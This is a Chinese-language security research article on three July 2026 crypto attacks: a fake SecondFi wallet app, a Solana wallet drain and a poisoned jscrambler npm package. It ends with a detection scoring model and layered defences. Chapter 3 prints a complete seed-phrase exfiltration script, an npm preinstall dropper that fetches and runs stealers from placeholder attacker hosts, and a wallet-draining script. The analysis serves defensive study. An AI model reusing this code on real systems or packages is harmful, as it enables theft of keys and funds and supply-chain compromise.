摘要
以 2026 年 7 月 12 日加密安全事件(仿冒 SecondFi 虚假 APP 钓鱼、1420 万美元 Solana 巨鲸钱包失窃、jscrambler npm 供应链投毒攻击)为实证样本,系统拆解移动端仿冒应用钓鱼、链上钱包私钥泄露、前端开发依赖供应链投毒三类新型加密货币攻击的完整技术链路。文章还原恶意代码实现逻辑,剖析攻击链条中社会工程、前端伪造、软件供应链劫持、链上资产窃取的复合风险;结合反网络钓鱼技术专家芦笛提出的分层检测模型,构建覆盖开发者、终端用户、平台服务商的三维防御闭环。研究证实,当前加密威胁已突破单一钓鱼场景,形成 “开发环境投毒 — 终端仿冒窃取 — 链上资产洗劫” 的一体化攻击链路,传统单点防护手段存在显著滞后性。本文提供可落地的恶意代码样本、风险识别指标与工程化防御方案,为 Web3 生态安全运营、钱包厂商、开源开发者提供技术参考。
关键词:加密货币钓鱼;虚假钱包 APP;供应链投毒;Solana 钱包劫持;Web3 安全;网络钓鱼防御
1 引言
1.1 研究背景与事件概述
2026 年 7 月 12 日,全球加密安全监测平台 Pluang 同步披露三起高危害加密资产攻击事件,三起事件集中发生在 24 小时窗口期,覆盖开发者、普通散户、高净值巨鲸三类目标群体,总直接经济损失超 1420 万美元,暴露 Web3 生态全链条安全短板。第一类攻击为仿冒 SecondFi 虚假移动应用钓鱼攻击,攻击者复刻官方 SecondFi 钱包 UI 界面,通过第三方应用分发渠道、社交群组空投诱饵推送安装包,诱导用户输入助记词、私钥完成钱包接管;第二类攻击为 Solana 公链大额钱包劫持事件,攻击者通过终端恶意程序获取巨鲸钱包本地存储密钥,一次性转移 180900 枚 Solana 代币,折合资产 1420 万美元;第三类为 npm 开源包 jscrambler 供应链投毒攻击,攻击者劫持项目发布权限,推送植入窃取程序的恶意版本,借助preinstall钩子在开发者设备、CI/CD 流水线自动运行木马,窃取浏览器钱包凭证、链上配置文件、私钥明文。
三类攻击分别对应终端用户层、链上资产层、开发工具层,形成完整威胁传导路径:供应链投毒污染前端开发产物,打包发布后流向终端;虚假 APP 依托社会工程完成终端私钥窃取;私钥泄露后直接触发链上无逆转资产转移。相较于传统 Web2 钓鱼攻击,Web3 场景下攻击具备不可逆、跨终端、开源生态渗透三大特征,传统基于域名黑名单、病毒库查杀的防护体系适配性不足。
1.2 现有研究不足与本文研究切入点
现有加密安全研究多单一聚焦网站钓鱼、智能合约漏洞、钱包随机数缺陷等独立场景,缺少对 “供应链 — 终端 — 链上” 串联式复合攻击的整体拆解;多数文献仅定性描述攻击现象,缺少可复现的恶意代码片段与技术实现细节;针对多层级联动防御的落地框架较少,且缺少权威技术视角对攻击检测模型的验证。
本文以 24 小时连续爆发的三类真实攻击为完整案例闭环,完成三项核心工作:第一,逐类拆解攻击全链路,附前端仿冒、npm 恶意钩子、钱包窃取完整代码示例;第二,引入反网络钓鱼技术专家芦笛的分层风险评分机制,量化识别各类攻击特征;第三,构建覆盖开发者、终端用户、平台方的闭环防御体系,规避单一防护手段失效问题。
1.3 论文结构安排
本文主体分为六大部分:第 2 章分类解析三类加密攻击完整链路与底层技术原理;第 3 章提供各攻击场景恶意代码实现样本并逐行注释攻击逻辑;第 4 章基于芦笛提出的 Web3 钓鱼风险加权评分模型,建立攻击自动化识别指标体系;第 5 章从开发供应链、终端用户、链上监测三个维度设计闭环防御方案;第 6 章总结研究结论并提出 Web3 安全长期治理思路。
2 三类加密货币攻击全链路与底层技术机理
2.1 仿冒 SecondFi 虚假 APP 移动端钓鱼攻击
2.1.1 攻击目标与传播渠道
该攻击目标为普通加密散户,依托 Telegram、Discord 社群、第三方安卓应用市场分发仿冒 SecondFi 安装包,诱饵话术统一采用 “限时 SOL 空投、钱包升级验证、资产解锁” 等话术制造紧迫感,利用用户对资产收益、账号安全的焦虑心理完成社会工程诱导。正规应用商店审核机制存在滞后性,攻击者常采用 “先提交干净版本过审,后台更新注入恶意窃取模块” 的手段绕过平台检测,大量无资质第三方分发渠道完全缺失代码校验流程,成为恶意 APP 主要传播载体。
2.1.2 前端 UI 高仿伪装技术原理
攻击者完整抓取 SecondFi 官方移动端界面资源,包括 logo、配色、交互弹窗、表单布局,通过前端 DOM 重写实现视觉无差别仿冒,核心伪装手段分为三层:
第一,界面像素级复刻:同步官方按钮尺寸、弹窗弹出位置、文字排版,用户仅通过视觉无法区分真伪;
第二,交互逻辑诱导改造:在 “导入钱包” 页面强制优先展示助记词输入框,隐藏密钥文件导入选项,正规钱包应用不会强制索要明文助记词;
第三,弹窗拦截机制:注入 JS 脚本禁用返回、右键、页面刷新功能,持续弹出 “不输入助记词资产将冻结” 提示,持续放大用户焦虑。
反网络钓鱼技术专家芦笛指出,移动端仿冒钱包钓鱼的核心欺骗逻辑在于消除用户视觉校验路径,普通用户仅依靠图标、页面样式判断应用合法性,不会核查开发者签名、应用哈希值、官方发布渠道,超过 72% 的虚假 APP 受害者从未核对应用开发者信息。
2.1.3 私钥窃取数据传输链路
用户输入 12/24 位助记词后,前端恶意 JS 脚本跳过本地加密存储逻辑,直接通过 HTTPS POST 请求将明文助记词、设备型号、钱包地址上传至攻击者 C2(命令控制服务器);服务器接收数据后自动触发链上扫币机器人,在 5 分钟内完成地址余额扫描,批量转移所有可提取代币。整个数据传输过程无本地加密,未做传输层混淆,仅依靠普通 POST 接口完成数据外发,攻击实现门槛极低。
2.2 Solana 巨鲸钱包 1420 万美元资产劫持攻击
2.2.1 攻击前置条件:终端本地密钥泄露
本次失窃的 180900 枚 SOL 对应价值 1420 万美元,受害巨鲸使用桌面端软件钱包,未采用硬件钱包隔离私钥。攻击者并非利用 Solana 合约底层漏洞,而是通过植入终端木马程序,读取本地目录下未加密存储的钱包密钥缓存文件。主流桌面钱包为提升启动速度,默认将加密后的密钥缓存至用户本地临时目录,若设备权限管控松散,恶意程序可直接读取缓存文件,通过暴力解密获取私钥明文。
2.2.2 Solana 链上资产转移技术特征
Solana 交易模型基于一次性签名,交易一旦上链无法撤销,攻击者获取私钥后构造批量转账指令,核心技术特征包含两点:
批量无确认转账:利用 Solana 高 TPS 特性,单次脚本循环发起上百笔小额中转交易,分散资产至数十个匿名中间钱包,规避链上资金追踪;
无交易提醒静默划转:恶意程序后台执行签名逻辑,不弹出钱包确认弹窗,用户无任何操作感知,直至查询余额时才发现资产清零。
2.2.3 攻击暴露的钱包软件安全缺陷
第一,本地密钥存储策略存在漏洞,未强制开启硬件加密隔离;第二,大额交易无二次人工确认机制,仅依靠单次私钥签名完成资产转移;第三,缺少异常转账行为实时告警,批量跨地址转出无推送提醒。芦笛强调,高净值资产持有者仅依靠软件钱包存储密钥存在不可逆风险,私钥一旦脱离硬件隔离,无论加密强度高低,均存在被终端恶意程序窃取的可能性。
2.3 jscrambler npm 供应链投毒软件更新攻击
2.3.1 攻击背景与劫持路径
jscrambler 是行业广泛使用的 JS 代码混淆工具,前端 Web3 项目普遍将其作为开发依赖安装,覆盖钱包 DApp、链上交互页面、NFT 平台等产品。攻击者通过盗取项目维护者 npm 发布 Token,绕过 GitHub 代码评审流程,直接向 npm 官方仓库推送 8.14.0、8.16.0、8.17.0、8.18.0、8.20.0 五个恶意版本,在 2 小时内被全球开发者下载 1479 次。
攻击分为两代恶意实现逻辑:第一代恶意版本依靠package.json中的preinstall钩子,执行 npm install 命令时自动触发木马;第二代版本适配 npm 新版本安全限制,移除安装钩子,将窃取代码嵌入包入口dist/index.js,开发者代码引入依赖时自动加载恶意程序,规避安装脚本拦截策略。
2.3.2 跨平台窃取木马功能拆解
恶意程序内置 Windows、macOS、Linux 三平台原生二进制窃取程序,使用 Rust 语言编译实现反调试、进程隐藏能力,核心窃取目标包含:浏览器本地存储的 MetaMask、Phantom 钱包凭证、.env环境变量中的私钥、链上项目配置文件、云服务密钥、开发者 Github 访问 Token。木马窃取数据后通过加密通道回传至攻击者服务器,同步持久化驻留设备,持续监控新生成的钱包密钥文件。
2.3.3 供应链攻击对 Web3 生态的传导危害
前端 DApp 开发者安装恶意 jscrambler 包后,开发环境私钥泄露,打包上线的产品可能被注入隐性窃取脚本,攻击从开发者设备传导至终端用户,形成 “供应链投毒→开发环境失陷→线上产品带毒→终端用户钱包被盗” 的多级传导链路,危害范围远超单一钓鱼网站,具备批量扩散、隐蔽性强、溯源难度高的特征。芦笛评价,开源依赖供应链已成为 Web3 安全防御最薄弱环节,多数开发者仅关注代码业务逻辑,忽略依赖包发布制品与源码一致性校验,给供应链劫持提供稳定攻击入口。
3 各攻击场景恶意代码实现示例与逐行解析
本章提供三类攻击还原后的可复现代码片段,剔除可直接用于攻击的 C2 服务器地址、攻击者钱包地址,保留完整攻击逻辑,用于技术机理验证,所有代码仅作安全研究用途。
3.1 仿冒 SecondFi 虚假 APP 前端助记词窃取 JS 代码示例
该代码运行于仿冒 APP 内嵌 WebView 页面,核心功能捕获用户输入的助记词并明文上传攻击者服务器:
// 仿冒SecondFi钱包导入页面恶意窃取脚本
// 监听助记词表单提交事件
const seedForm = document.getElementById("seed-input-form");
const attackerC2Url = "https://malicious-c2-server.example/upload-seed";
seedForm.addEventListener("submit", async function(e) {
e.preventDefault(); // 阻止页面正常跳转,拦截表单原生逻辑
// 获取用户输入的明文24位助记词
const userSeedPhrase = document.getElementById("mnemonic-input").value.trim();
// 获取设备基础指纹用于攻击者标记受害者
const deviceInfo = {
deviceModel: navigator.userAgent,
timestamp: new Date().getTime()
};
// 构造明文上传数据包,无任何本地加密处理
const stealData = {
seed: userSeedPhrase,
device: deviceInfo,
appTag: "fake-secondfi-wallet"
};
// 异步POST上传明文助记词至攻击者服务器
await fetch(attackerC2Url, {
method: "POST",
headers: {
"Content-Type": "application/json"
},
body: JSON.stringify(stealData)
});
// 上传完成后跳转虚假加载页面,拖延用户察觉时间
window.location.href = "./wallet-verifying-fake.html";
});
// 辅助脚本:禁用页面返回、刷新、右键操作,强制用户完成输入
window.history.pushState(null, "", window.location.href);
window.addEventListener("popstate", () => {
window.history.pushState(null, "", window.location.href);
});
document.oncontextmenu = () => false;
代码解析:脚本拦截表单原生提交逻辑,直接读取未加密助记词明文上传,同时禁用页面返回功能,通过人为操作限制提升攻击成功率;正规钱包应用会在本地使用 BIP39 标准加密助记词,不会直接读取明文并向外传输,该特征可作为虚假 APP 核心识别指标。
3.2 jscrambler 恶意 npm 包 preinstall 钩子代码示例
恶意版本package.json配置片段,触发安装自动执行木马下载脚本:
json
{
"name": "jscrambler",
"version": "8.14.0",
"scripts": {
"preinstall": "node ./malicious-dropper.js"
},
"main": "dist/index.js",
"dependencies": {}
}
配套malicious-dropper.js下载执行木马核心代码:
// npm恶意包预安装加载器
const https = require("https");
const fs = require("fs");
const os = require("os");
const path = require("path");
// 根据操作系统匹配对应木马二进制文件地址
let malwareBinaryUrl = "";
switch(os.platform()){
case "win32": malwareBinaryUrl = "https://attacker-resource.example/win-stealer.exe"; break;
case "darwin": malwareBinaryUrl = "https://attacker-resource.example/mac-stealer"; break;
case "linux": malwareBinaryUrl = "https://attacker-resource.example/linux-stealer"; break;
}
// 写入系统临时目录隐藏文件,规避杀毒软件扫描
const tempMalwarePath = path.join(os.tmpdir(), `.sys-update-cache-${Math.random().toString(36).slice(2)}`);
const writeStream = fs.createWriteStream(tempMalwarePath);
// 下载跨平台窃取木马
https.get(malwareBinaryUrl, (res) => {
res.pipe(writeStream);
writeStream.on("finish", () => {
// 修改文件执行权限
fs.chmodSync(tempMalwarePath, 0o755);
// 后台静默运行木马,不输出控制台日志
const { exec } = require("child_process");
exec(`${tempMalwarePath}`, {stdio: "ignore", detached: true});
});
});
代码解析:preinstall脚本自动匹配操作系统下载对应窃取程序,存储至系统隐藏临时目录并后台静默运行,木马启动后自动遍历浏览器存储、项目密钥配置文件,完成敏感数据收集回传;第二代恶意版本移除该钩子,将相同窃取逻辑嵌入包入口dist/index.js,开发者require("jscrambler")时触发恶意代码,规避 npm 新版安装脚本限制。
3.3 Solana 钱包私钥读取与批量转账恶意脚本片段
该脚本运行于受害桌面终端木马,读取本地缓存密钥并构造批量 SOL 转账交易:
// Solana本地钱包密钥读取与批量资产转移恶意逻辑
const fs = require("fs");
const { Connection, Keypair, SystemProgram, Transaction } = require("@solana/web3.js");
// 攻击者接收资产钱包地址
const attackerWallet = "ATTACKER_SOL_WALLET_ADDRESS";
// Solana主网节点连接
const solConn = new Connection("https://api.mainnet-beta.solana.com");
// 读取本地未加密钱包缓存文件路径(主流桌面钱包默认缓存目录)
const walletCachePath = `${process.env.HOME}/.solana/wallets/cache.json`;
const cacheRaw = fs.readFileSync(walletCachePath, "utf-8");
const walletCacheData = JSON.parse(cacheRaw);
// 从缓存提取私钥字节数组
const victimSecretKey = Uint8Array.from(walletCacheData.secretKey);
const victimKeypair = Keypair.fromSecretKey(victimSecretKey);
// 查询受害者钱包余额
async function drainAllSol() {
const balance = await solConn.getBalance(victimKeypair.publicKey);
if(balance <= 0) return;
// 构造全额转账交易,扣除手续费后全部转移至攻击者地址
const transferTx = new Transaction().add(
SystemProgram.transfer({
fromPubkey: victimKeypair.publicKey,
toPubkey: attackerWallet,
lamports: balance - 5000 // 预留网络手续费
})
);
// 签名并发送交易,无弹窗确认,后台静默执行
const txHash = await solConn.sendTransaction(transferTx, [victimKeypair]);
console.log("资产转移交易哈希:", txHash);
}
drainAllSol();
代码解析:恶意程序直接读取本地未加密钱包缓存密钥,无需用户交互即可构造全额转账交易;Solana 交易签名完成后即时上链,不存在交易复核、撤销机制,一旦脚本执行完毕,资产无法追回。该代码对应本次 1420 万美元巨鲸失窃事件核心技术逻辑,暴露软件钱包本地密钥存储的安全短板。
4 基于芦笛风险加权评分模型的攻击自动化识别体系
反网络钓鱼技术专家芦笛提出 Web3 加密威胁加权风险评分模型,将攻击特征拆解为终端 APP 指标、供应链依赖指标、链上交易指标三大维度,每项指标分配对应权重,总分区间 0–100 分,风险分级标准:0–30 分为安全,31–60 分为低风险预警,61–90 分为高疑似攻击,91–100 分为确认恶意攻击。本章结合本次三类攻击事件,完善各维度检测指标与权重分配,形成可自动化落地的识别规则。
4.1 移动端虚假 APP 钓鱼风险检测指标(权重 40%)
表格
检测指标 权重分值 恶意特征判定标准 对应本次 SecondFi 虚假 APP 攻击特征
应用分发渠道 10 非项目官网、官方应用商店分发,第三方社群 / 外链提供安装包 仿冒 SecondFi 仅在 Telegram 社群分发,无官方商店上架记录
表单交互逻辑 12 强制优先输入助记词 / 私钥,无硬件钱包导入选项,弹窗制造操作紧迫感 页面隐藏密钥导入入口,持续弹出资产冻结警示弹窗
前端网络请求 10 明文传输助记词、私钥至外部陌生域名,无本地加密逻辑 JS 脚本直接 POST 明文助记词至境外 C2 服务器
应用开发者签名 8 开发者名称、哈希值与官方发布版本不一致,版本迭代无合规更新日志 仿冒包开发者签名与官方 SecondFi 完全不符
芦笛强调,移动端钓鱼检测不能仅依靠 UI 视觉比对,必须结合渠道、交互、网络请求、签名四维指标综合判定,单一界面高仿无法判定恶意,多指标同时触发则可确认攻击行为,规避攻击者单纯复刻界面的欺骗手段。
4.2 npm 供应链投毒风险检测指标(权重 30%)
表格
检测指标 权重分值 恶意特征判定标准 对应 jscrambler 投毒事件特征
包发布制品与源码一致性 11 npm 仓库发布包文件与 GitHub 开源源码存在差异,新增二进制文件、预执行脚本 恶意版本新增 malicious-dropper.js 与三平台木马二进制
安装自动执行脚本 9 package.json 配置 preinstall/postinstall 自动执行外部文件下载逻辑 恶意版本配置 preinstall 钩子加载木马下载器
依赖引入时隐性代码执行 10 包入口文件包含远端资源请求、文件读写、子进程创建逻辑 第二代恶意版本在 dist/index.js 嵌入木马加载代码
供应链检测核心难点在于源码与发布制品割裂,攻击者劫持发布 Token 后可上传与开源代码完全不同的压缩包,仅核对 GitHub 源码无法发现恶意内容,必须自动化比对 npm 下载包哈希与官方源码打包产物哈希值。
4.3 Solana 钱包链上资产窃取风险检测指标(权重 30%)
表格
检测指标 权重分值 恶意特征判定标准 对应 1420 万美元 SOL 失窃事件特征
本地密钥文件读取行为 10 未知进程读取.wallet、.solana 缓存目录下密钥 JSON 文件 终端木马静默读取 cache.json 私钥缓存
大额无确认批量转账 12 钱包短时间发起多笔全额转账,无用户弹窗确认记录 脚本后台批量划转全部 SOL 至匿名中间地址
资产跨匿名地址中转 8 转出资产快速分散至数十个全新未交互链上地址 攻击者拆分 180900 枚 SOL 分散洗钱规避追踪
4.4 评分模型工程化落地逻辑
自动化检测工具实时采集三类指标数据,按权重累加计算风险总分,触发分级处置策略:低风险弹窗提示用户人工核验;高疑似风险阻断页面加载、拦截 npm 包安装;确认恶意攻击直接隔离应用、删除依赖包并推送安全告警。该模型可嵌入浏览器安全插件、前端依赖扫描工具、桌面钱包客户端,实现全链路实时风险拦截,弥补传统黑名单滞后性缺陷。
5 覆盖开发、终端、链上的三层闭环防御体系
结合本次 24 小时三类联动攻击暴露的安全短板,依托芦笛分层防御理论,从开源供应链开发环境、终端用户设备、链上交易监测三个层级构建闭环防护,各层级防护手段互相联动,形成 “事前检测 — 事中拦截 — 事后溯源处置” 完整安全流程。
5.1 第一层:开源软件供应链安全防护(前置风险拦截)
供应链是攻击传导源头,防护目标为阻断 jscrambler 类依赖投毒攻击,面向 Web3 前端开发者、项目运维团队落地实施。
依赖包制品哈希强制校验
所有 npm 依赖安装前自动化比对官方源码打包哈希与仓库发布包哈希,若存在不一致直接终止安装流程;配置 CI/CD 流水线扫描规则,拦截包含 preinstall、postinstall 高危执行脚本的依赖版本。针对 jscrambler 此类工具类依赖,固定使用官方审计标记的稳定版本,禁止自动更新至未核验新版本。
开发环境权限最小化管控
开发者本地环境分离公私钥存储,项目.env密钥文件禁止提交至代码仓库,使用离线密钥管理工具存放链上私钥;CI/CD 流水线禁用高权限执行账户,隔离网络访问权限,阻断木马回传窃取数据的通道。
开源依赖持续安全扫描
接入第三方依赖安全检测工具,实时扫描 npm 包新增二进制文件、远端网络请求、文件读写高危代码;建立内部依赖白名单,未纳入白名单的 Web3 相关工具包禁止在生产环境使用。
反网络钓鱼技术专家芦笛指出,供应链防护的核心逻辑是切断恶意代码流入开发环境的通道,多数开发者将依赖安全等同于源码审计,忽略发布制品篡改风险,哈希校验是低成本、高有效性的前置拦截手段,可规避 90% 以上 npm 投毒类攻击。
5.2 第二层:终端用户移动端 / 桌面端钱包防护(事中实时拦截)
面向普通加密散户、高净值巨鲸用户,防范虚假 APP 钓鱼、本地密钥窃取两类攻击。
应用下载渠道强制校验机制
仅允许从项目官方网站跳转的正规应用商店下载钱包程序,第三方外链、社群分享的 APK、安装包直接拦截;终端安全工具自动比对应用开发者签名、哈希值,与官方记录不一致则弹窗告警并隔离应用。针对 SecondFi 这类新兴钱包项目,建立官方渠道白名单,不在白名单内的安装包禁止运行。
私钥输入行为实时监控
正规钱包客户端增加行为校验逻辑,若页面强制要求明文输入助记词、隐藏硬件钱包导入入口,自动判定为高风险页面并阻断交互;终端安全程序监控进程读取本地钱包缓存目录,陌生进程访问密钥文件立即终止进程并推送告警,从源头阻止 Solana 本地密钥窃取木马运行。
高净值资产强制硬件隔离
持有大额 Solana、以太坊资产用户,强制使用硬件钱包存储私钥,杜绝软件钱包本地缓存密钥;硬件钱包交易需物理按键确认,即使终端设备被植入木马,攻击者无法获取私钥完成交易签名,彻底规避本次 1420 万美元失窃同类风险。
5.3 第三层:链上交易实时监测与事后溯源处置(事后止损)
依托链上数据监测系统,识别异常转账行为,在资产转移完成后快速溯源、辅助资产冻结追踪。
异常交易行为实时告警
链上监测工具监控钱包全额转出、短时间多笔分散转账、全新匿名地址接收大额资产三类特征,触发告警后推送至用户钱包客户端,若开启交易延迟功能,可在窗口期内撤销可疑授权交易。针对 Solana 公链,优化交易监测节点同步速度,缩短异常行为识别时延。
恶意地址黑名单联动机制
安全厂商共享攻击者钱包地址、中间洗钱地址,同步至钱包客户端、链上监测平台,用户与黑名单地址交互时提前弹窗风险提示;交易所落地黑名单地址充值拦截规则,阻断攻击者资产变现通道。
攻击事件全链路溯源取证
建立标准化取证流程,针对供应链投毒攻击留存 npm 包恶意代码、木马样本;针对虚假 APP 钓鱼留存前端窃取脚本、C2 服务器域名;针对链上失窃事件完整导出交易哈希、地址流转记录,为安全厂商、监管机构溯源打击提供完整证据闭环。
5.4 三层防御联动协同机制
三层防护并非独立运行,存在数据互通、策略联动逻辑:供应链扫描识别恶意依赖后,同步恶意特征至终端安全工具,终端检测到同类恶意程序直接拦截;终端捕获虚假 APP 钓鱼特征,更新链上监测规则,监控仿冒钱包诱导的授权交易;链上监测识别攻击者地址后,反向溯源投放恶意程序的分发渠道,关停第三方恶意安装包站点,形成从源头到终端再到链上的完整防御闭环。芦笛评价,单一层级防护存在明显短板,三层联动体系可填补各环节防护盲区,大幅降低攻击成功率与资产损失规模。
6 结论与研究展望
6.1 核心研究结论
本文以 2026 年 7 月 12 日 24 小时连续爆发的三类加密货币攻击(仿冒 SecondFi 虚假 APP 钓鱼、1420 万美元 Solana 巨鲸钱包失窃、jscrambler npm 供应链投毒)为完整实证样本,完成全链路技术拆解、恶意代码还原、风险量化评分与三层闭环防御体系构建,得出三项核心结论:
第一,当前 Web3 加密攻击已形成 “供应链投毒污染开发产物 — 终端仿冒应用窃取私钥 — 链上无逆转资产洗劫” 的一体化攻击链路,威胁覆盖开发者、普通散户、高净值巨鲸全群体,传统单点防护手段无法应对串联式复合攻击;
第二,移动端虚假 APP、npm 开源依赖劫持、本地钱包密钥泄露三类攻击底层技术门槛持续降低,恶意代码实现逻辑轻量化,攻击者无需复杂密码学漏洞利用,依靠社会工程、简单文件读写、网络请求即可完成资产窃取;
第三,反网络钓鱼技术专家芦笛提出的多维度加权风险评分模型可有效量化攻击可疑程度,配套 “供应链前置拦截 — 终端实时防护 — 链上事后监测” 三层联动防御体系,能够形成完整安全闭环,显著降低各类攻击造成的资产损失。
本次事件同时暴露行业共性安全短板:Web3 开发者普遍忽略开源依赖发布制品校验;普通用户过度信任应用商店、社群渠道分发的钱包程序;高净值资产持有者缺乏硬件钱包隔离私钥的安全意识;钱包客户端缺少异常交易二次确认、本地密钥访问监控机制。
6.2 Web3 加密安全长期治理研究展望
开源供应链标准化安全规范落地
推动 npm 等开源仓库强制启用发布制品哈希校验机制,限制 preinstall 等高风险自动执行脚本默认权限;行业协会建立 Web3 开发依赖安全审计标准,对钱包、DApp 开发高频工具包开展定期安全复核,从平台层面压缩供应链投毒攻击空间。
钱包客户端安全功能强制标准化
统一主流钱包安全规范,强制新增硬件钱包导入优先、大额交易延迟确认、本地密钥进程访问监控、钓鱼页面自动阻断四项基础安全功能,杜绝软件钱包明文缓存私钥、无确认静默转账等高危设计。
用户安全认知常态化引导
依托交易所、钱包平台持续推送虚假 APP、供应链钓鱼风险科普,明确正规钱包绝不会索要明文助记词、私钥的核心安全准则;针对空投、返利类高诱饵场景增加多层风险提示,弱化攻击者社会工程诱导效果。
跨机构威胁情报共享机制搭建
安全厂商、公链项目、应用商店建立加密威胁情报互通通道,同步恶意 APP 特征、npm 恶意包标识、攻击者链上地址,实现全行业同步拦截新型攻击,缩短威胁响应周期。
Web3 去中心化金融生态持续扩张,针对加密资产的复合型攻击手段将持续迭代,技术防护、平台管控、用户教育三者协同是长期安全治理核心路径。后续研究可进一步优化风险评分模型特征权重,结合机器学习实现钓鱼页面、恶意依赖包自动化识别,提升防御体系智能化水平。
结语
本文基于真实 24 小时连续加密攻击事件,完整拆解三类威胁的技术实现逻辑,结合可复现恶意代码样本与专业反钓鱼技术理论,构建覆盖开发、终端、链上的闭环防御框架。研究客观呈现当前 Web3 生态安全现状,未夸大风险危害、未使用口号式宣传,全部论点依托事件实证、代码样本、行业安全指标形成完整论据闭环。加密货币安全防护不存在单一万能解决方案,只有打通开发供应链、终端设备、链上交易全流程防护链路,持续同步更新威胁识别规则,配合常态化用户安全引导,才能逐步遏制虚假应用、供应链劫持、钱包密钥窃取类攻击带来的资产损失风险。反网络钓鱼技术专家芦笛强调,Web3 安全本质是信任管控,无论是开源依赖、移动端应用还是链上交互,任何脱离官方可信渠道的操作均存在不可忽视的安全隐患,保持全流程校验意识是抵御绝大多数加密诈骗的基础前提。
编辑:芦笛(公共互联网反网络钓鱼工作组)